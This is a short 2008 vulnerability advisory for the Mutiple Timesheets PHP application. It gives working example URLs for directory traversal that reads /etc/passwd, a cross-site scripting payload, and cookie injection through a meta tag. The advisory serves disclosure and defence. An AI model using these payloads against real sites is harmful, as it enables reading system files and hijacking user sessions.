Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities

2008.03.20
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

[+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: Mutiple Timesheets [~] Download: http://riceball.com/drupal/files/mts-5.zip [~] Exploit: Multiple Remote Vulnerabilities [High] [~] Bug Found By: Jose Luis Gngora Fernndez | JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Good! [+] Directory traversal: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/?tab=[FILE] [~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//.. /..//../..//../..//etc/passwd [+] Cross Site Scripting: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/?tab=[XSS] [~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B< /ScRiPt> [+] Cookie Manipulation: [~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php [~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie] [~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+cont ent='cookiename=cookievalue'>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top